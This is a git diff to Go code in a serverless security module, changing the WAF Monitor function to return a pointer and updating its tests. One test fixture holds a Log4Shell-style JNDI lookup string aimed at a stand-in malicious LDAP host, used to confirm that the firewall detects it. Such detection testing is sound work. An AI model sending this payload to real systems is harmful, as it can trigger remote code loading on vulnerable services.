diff --git a/pkg/serverless/appsec/appsec.go b/pkg/serverless/appsec/appsec.go index d0147a40d63e6..10fb6aaf55eb0 100644 --- a/pkg/serverless/appsec/appsec.go +++ b/pkg/serverless/appsec/appsec.go @@ -110,11 +110,11 @@ func (a *AppSec) Close() error { // Monitor runs the security event rules and return the events as a slice // The monitored addresses are all persistent addresses -func (a *AppSec) Monitor(addresses map[string]any) (res waf.Result) { +func (a *AppSec) Monitor(addresses map[string]any) *waf.Result { log.Debugf("appsec: monitoring the request context %v", addresses) ctx := waf.NewContext(a.handle) if ctx == nil { - return res + return nil } defer ctx.Close() timeout := a.cfg.WafTimeout @@ -130,7 +130,7 @@ func (a *AppSec) Monitor(addresses map[string]any) (res waf.Result) { log.Debugf("appsec: waf timeout value of %s reached", timeout) } else { log.Errorf("appsec: unexpected waf execution error: %v", err) - return res + return nil } } @@ -140,9 +140,9 @@ func (a *AppSec) Monitor(addresses map[string]any) (res waf.Result) { } if !a.eventsRateLimiter.Allow() { log.Debugf("appsec: security events discarded: the rate limit of %d events/s is reached", a.cfg.TraceRateLimit) - res = waf.Result{} + return nil } - return res + return &res } // wafHealth is a simple test helper that returns the same thing as `waf.Health` diff --git a/pkg/serverless/appsec/appsec_test.go b/pkg/serverless/appsec/appsec_test.go index ba6c1b0e42a0c..78d330fa49e40 100644 --- a/pkg/serverless/appsec/appsec_test.go +++ b/pkg/serverless/appsec/appsec_test.go @@ -69,8 +69,9 @@ func TestMonitor(t *testing.T) { }, "server.request.body": "eyJ0ZXN0I${jndi:ldap://16.0.2.staging.malicious.server/a}joiYm9keSJ9", } - events := asm.Monitor(addresses) - require.NotNil(t, events) + res := asm.Monitor(addresses) + require.NotNil(t, res) + require.True(t, res.HasEvents()) }) t.Run("api-security", func(t *testing.T) { @@ -136,7 +137,8 @@ func TestMonitor(t *testing.T) { "query": {"$http_server_vars"}, }, }) - require.NotEmpty(t, res.Derivatives) + require.NotNil(t, res) + require.True(t, res.HasDerivatives()) schema, err := json.Marshal(res.Derivatives) require.NoError(t, err) require.Equal(t, tc.schema, string(schema)) diff --git a/pkg/serverless/appsec/httpsec/http.go b/pkg/serverless/appsec/httpsec/http.go index 7e3ab305057e3..1742e0208ddb7 100644 --- a/pkg/serverless/appsec/httpsec/http.go +++ b/pkg/serverless/appsec/httpsec/http.go @@ -31,7 +31,7 @@ import ( // subprocessor monitoring the given security rules addresses and returning // the security events that matched. type Monitorer interface { - Monitor(addresses map[string]any) waf.Result + Monitor(addresses map[string]any) *waf.Result } // AppSec monitoring context including the full list of monitored HTTP values